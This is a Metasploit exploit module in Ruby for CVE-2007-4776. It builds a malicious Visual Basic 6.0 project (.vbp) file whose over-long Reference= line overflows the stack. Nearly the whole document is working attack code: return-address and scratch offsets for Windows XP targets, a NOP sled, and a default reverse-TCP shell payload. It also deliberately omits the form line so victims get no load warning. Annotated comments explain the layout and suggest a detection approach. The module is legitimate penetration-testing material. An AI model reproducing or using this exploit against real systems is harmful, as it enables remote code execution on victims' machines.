
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format exploit module for CVE-2007-4776: Microsoft Visual Basic 6.0
# mishandles an over-long `Reference=` line in a Visual Basic Project (.vbp)
# file. The module builds such a file so that the overflow overwrites a stack
# return address and the encoded payload runs when the project is opened.
#
# This module only generates a file: `exploit` assembles the .vbp text in
# memory and hands it to `file_create` (provided by Msf::Exploit::FILEFORMAT);
# nothing is executed locally. The `Notes` block flags CRASH_SERVICE_DOWN
# stability, ARTIFACTS_ON_DISK side effects and UNRELIABLE_SESSION reliability.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata, targets, payload constraints and the FILENAME
  # option with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Visual Basic VBP Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Microsoft Visual Basic
          6.0. A specially crafted Visual Basic Project (VBP) file containing
          a long reference line can be used to execute arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Arch' => [ARCH_X86],
        'Author' => [
          'Koshi', # Discovery and exploit
          'MC', # Metasploit
          'bcoles', # Offsets for XP x86-64
        ],
        'References' => [
          [ 'CVE', '2007-4776' ],
          [ 'CWE', '119' ],
          [ 'EDB', '4361' ],
          [ 'OSVDB', '36936' ],
          [ 'BID', '25629' ]
        ],
        # DisablePayloadHandler is true, so this module does not start a
        # listener for the reverse_tcp payload by itself.
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/shell/reverse_tcp',
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
        # BadChars are NUL, LF, CR and space: the payload lives inside a
        # CRLF-terminated text line, so any of these would cut or reshape it.
        # DisableNops means the payload is not padded up to Space with NOPs;
        # `exploit` supplies its own 24-byte NOP sled instead.
        'Payload' => {
          'Space' => 650,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
          'DisableNops' => true
        },
        'Platform' => 'win',
        # Both targets use the same `Ret` (a `call esp` in vba6.dll, per the
        # inline comments) and differ only in `Scratch`, a writable (RW) page
        # address that depends on the OS build.
        'Targets' => [
          [
            'Windows XP SP0-SP3 (x86) (English)', {
              'Ret' => 0x0fabd271, # call esp ; vba6.dll
              'Scratch' => 0x7ffddfb4 # Address=0x7ffdd000; Size=0x1000; Access=RW; InitialAccess=RW
            }
          ],
          [
            'Windows XP SP1-SP2 (x86-64) (English)', {
              'Ret' => 0x0fabd271, # call esp ; vba6.dll
              'Scratch' => 0x7efa9010 # Address=0x7efa9000; Size=0x1000; Access=RW; InitialAccess=RW
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2007-09-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ]
        }
      )
    )

    # FILENAME is the output path consumed by file_create (default msf.vbp).
    register_options(
      [
        OptString.new('FILENAME', [true, 'The project file name.', 'msf.vbp']),
      ]
    )
  end

  # Builds the malicious .vbp text and writes it to FILENAME.
  #
  # Layout of the bytes appended to the `Reference=` line (offsets in bytes):
  #   0..495    random upper-case alpha filler
  #   496..499  target.ret, 32-bit little-endian (`pack('V')`) -- saved return address
  #   500..511  12 bytes of random upper-case filler
  #   512..515  target['Scratch'], 32-bit little-endian -- writable address
  #   516..539  24 NOPs
  #   540..     payload.encoded (at most 'Space' = 650 bytes)
  #
  # The filler is A-Z only, so none of the declared BadChars can appear in it.
  # Every run randomises the filler, the form/project names and the version
  # numbers, so a file-level detection should key on structure -- a single
  # `Reference=` line carrying roughly 540 bytes of preamble plus the payload,
  # i.e. far longer than a normal type-library reference -- rather than on
  # fixed byte patterns.
  def exploit
    form_name = "Form#{rand(1..9)}"

    # Overflow preamble; see the layout table above.
    sploit = rand_text_alpha_upper(496)
    sploit << [target.ret].pack('V')
    sploit << rand_text_alpha_upper(12)
    sploit << [target['Scratch']].pack('V')
    sploit << make_nops(24)
    sploit << payload.encoded

    vbp = "Type=Exe\r\n"
    # We exclude the "Form" field so we don't have to ship a form file (.frm)
    # along with the project file (.vbp). If the specified form file is not
    # present within the same directory as the project file, the user is warned
    # the file does not exist, and is prompted to confirm loading the project.
    # Selecting "No" halts loading the project and prevents payload execution.
    # vbp << "Form=#{form_name}.frm\r\n"

    # The overflow buffer is appended directly after "OLE Automation" with no
    # separator; the CRLF on the next line terminates the over-long reference.
    vbp << 'Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINNT\\System32\\stdole2.tlb#OLE Automation'
    vbp << "#{sploit}\r\n"

    # Remaining keys are ordinary VB6 project settings that make the file look
    # like a plausible project; Startup names the (absent) form.
    vbp << "Startup=\"#{form_name}\"\r\n"
    vbp << "Command32=\"\"\r\n"
    vbp << "Name=\"Project#{rand(1..9)}\"\r\n"
    vbp << "HelpContextID=\"0\"\r\n"
    vbp << "CompatibleMode=\"0\"\r\n"
    vbp << "MajorVer=1\r\n"
    vbp << "MinorVer=#{rand(1..9)}\r\n"
    vbp << "RevisionVer=#{rand(1..9)}\r\n"
    vbp << "AutoIncrementVer=0\r\n"
    vbp << "ServerSupportFiles=0\r\n"
    vbp << "VersionCompanyName=\"\"\r\n"
    vbp << "CompilationType=0\r\n"
    vbp << "OptimizationType=0\r\n"
    vbp << "FavorPentiumPro(tm)=0\r\n"
    vbp << "CodeViewDebugInfo=0\r\n"
    vbp << "NoAliasing=0\r\n"
    vbp << "BoundsCheck=0\r\n"
    vbp << "OverflowCheck=0\r\n"
    vbp << "FlPointCheck=0\r\n"
    vbp << "FDIVCheck=0\r\n"
    vbp << "UnroundedFP=0\r\n"
    vbp << "StartMode=0\r\n"
    vbp << "Unattended=0\r\n"
    vbp << "Retained=0\r\n"
    vbp << "ThreadPerObject=0\r\n"
    vbp << "MaxNumberOfThreads=1\r\n"
    vbp << "[MS Transaction Server]\r\n"
    vbp << "AutoRefresh=1\r\n"

    # file_create (Msf::Exploit::FILEFORMAT) writes the buffer to
    # datastore['FILENAME']; this is the on-disk artifact noted in `Notes`.
    print_status("Creating '#{datastore['FILENAME']}' file for #{target.name} ...")
    file_create(vbp)
  end
end